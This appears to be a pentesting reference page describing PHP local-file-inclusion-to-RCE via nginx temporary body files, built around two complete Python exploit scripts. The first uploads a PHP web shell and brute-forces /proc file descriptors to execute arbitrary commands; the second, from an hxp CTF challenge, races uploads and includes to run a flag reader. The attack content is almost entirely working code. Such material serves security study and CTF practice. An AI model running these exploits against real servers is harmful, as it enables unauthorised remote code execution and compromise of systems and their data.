# LFI2RCE via Nginx temp files
Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/
PHP code (a single unauthenticated `include` of the user-supplied `file` parameter):

```php
<?php include_once($_GET['file']);
```
While a large request body is being uploaded, the nginx worker (PID 34 in this example) keeps an open file descriptor to the temporary body file, even though the file itself has already been deleted:

```
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```

Note: `/proc/34/fd/15` cannot be included directly in this example, because PHP's `include` function would resolve the path to `/var/lib/nginx/body/0000001368 (deleted)`, which does not exist on the filesystem. Luckily, this minor restriction can be bypassed with some indirection such as `/proc/self/fd/34/../../../34/fd/15`, which ends up executing the content of the deleted file `/var/lib/nginx/body/0000001368`.

## Full Exploit

```python
#!/usr/bin/env python3
import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r = requests.get(URL, params={
    'file': '/proc/cpuinfo'
})
cpus = r.text.count('processor')

r = requests.get(URL, params={
    'file': '/proc/sys/kernel/pid_max'
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
    r = requests.get(URL, params={
        'file': f'/proc/{pid}/cmdline'
    })

    if b'nginx: worker process' in r.content:
        print(f'[*] nginx worker found: {pid}')

        nginx_workers.append(pid)
        if len(nginx_workers) >= cpus:
            break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
    print('[+] starting uploader')
    while not done:
        # small PHP web shell followed by enough padding to push the body over
        # nginx's in-memory buffer, so it gets written to a temp file on disk
        requests.get(URL, data='<?php system($_GET["c"]); //' + 16*1024*'A')
```
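To finish the attack, the script has to spawn the uploader threads and then brute-force each worker's file descriptors through the `/proc/self/fd/<pid>/../../../<pid>/fd/<fd>` indirection described above. A minimal sketch of that phase, reusing `URL`, `done`, `uploader` and `nginx_workers` from the script above; the `c` parameter matches the web shell planted by the uploader:

```python
# keep a pool of uploaders running so fresh /var/lib/nginx/body/* files exist at any time
for _ in range(16):
    threading.Thread(target=uploader).start()

# brute force the worker's fds; the ../../ indirection avoids include() failing on
# the "(deleted)" path that a direct /proc/<pid>/fd/<fd> would resolve to
def bruter(pid):
    global done
    while not done:
        print(f'[+] brute loop restarted: {pid}')
        for fd in range(4, 32):
            f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
            r = requests.get(URL, params={'file': f, 'c': 'id'})
            if r.text:
                print(f'[!] {f}: {r.text}')
                done = True
                return

for pid in nginx_workers:
    threading.Thread(target=bruter, args=(pid,)).start()
```

A non-empty response means one of the buffered bodies was successfully included, i.e. the web shell executed and arbitrary commands can now be run via the `c` parameter.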
Another exploit for the same primitive, written against an hxp CTF challenge (the script hunts for an `hxp{...}` flag); it assumes a target reachable at `SERVER` that exposes `?action=read&file=` (returns a file's contents) and `?action=include&file=` (runs the file through PHP's `include`):

```python
import multiprocessing
import random
import threading

import requests

SERVER = "http://localhost:8088"  # adjust to the target

def create_requests_session():
    session = requests.Session()
    # large connection pool so all worker processes/threads can reuse this session
    adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
    session.mount('http://', adapter)
    return session

def get_nginx_pids(requests_session):
    nginx_pids = set()
    # scan low PIDs for "nginx: worker process" using the file-read primitive
    for i in range(1, 200):
        cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
        if cmdline.startswith("nginx: worker process"):
            nginx_pids.add(i)
    return nginx_pids

def send_payload(requests_session, body_size=1024000):
    try:
        # the requested path (/bla) does not need to exist; the point is to make nginx
        # buffer a large request body containing the PHP payload to a temp file
        payload = '<?php system("/readflag"); exit(); ?>'
        requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
    except:
        pass

def send_payload_worker(requests_session):
    while True:
        send_payload(requests_session)

def send_payload_multiprocess(requests_session):
    # use all CPUs to keep uploading request bodies to nginx
    for _ in range(multiprocessing.cpu_count()):
        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
        p.start()

def generate_random_path_prefix(nginx_pids):
    # build a prefix from a random number of procfs components,
    # e.g. /proc/<pid1>/cwd/proc/<pid2>/root
    path = ""
    component_num = random.randint(0, 10)
    for _ in range(component_num):
        pid = random.choice(nginx_pids)
        if random.randint(0, 1) == 0:
            path += f"/proc/{pid}/cwd"
        else:
            path += f"/proc/{pid}/root"
    return path

def read_file(requests_session, nginx_pid, fd, nginx_pids):
    nginx_pid_list = list(nginx_pids)
    while True:
        path = generate_random_path_prefix(nginx_pid_list)
        path += f"/proc/{nginx_pid}/fd/{fd}"
        try:
            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
        except:
            continue
        # flags are formatted as hxp{...}
        if "hxp" in d:
            print("Found flag! ")
            print(d)

def read_file_worker(requests_session, nginx_pid, nginx_pids):
    # request-body fds tend to land in this range as sockets open and close
    for fd in range(10, 45):
        thread = threading.Thread(target=read_file, args=(requests_session, nginx_pid, fd, nginx_pids))
        thread.start()

def read_file_multiprocess(requests_session, nginx_pids):
    for nginx_pid in nginx_pids:
        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
        p.start()

if __name__ == "__main__":
    print('[DEBUG] Creating requests session')
    requests_session = create_requests_session()
    print('[DEBUG] Getting Nginx pids')
    nginx_pids = get_nginx_pids(requests_session)
    print(f'[DEBUG] Nginx pids: {nginx_pids}')
    print('[DEBUG] Starting payload sending')
    send_payload_multiprocess(requests_session)
    print('[DEBUG] Starting fd readers')
    read_file_multiprocess(requests_session, nginx_pids)
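Both exploits are races against nginx unlinking and closing its client-body temp files: one set of workers keeps POSTing large bodies so fresh `/var/lib/nginx/body/*` files (and the corresponding worker file descriptors) keep appearing, while another set spams `include` requests against `/proc/<worker pid>/fd/<fd>` paths until one of them lands on a buffered body that still contains the PHP payload. The random `/proc/<pid>/cwd` / `/proc/<pid>/root` prefixes resolve to the same file (assuming the workers run with `/` as both their cwd and root) while varying the path string on every attempt.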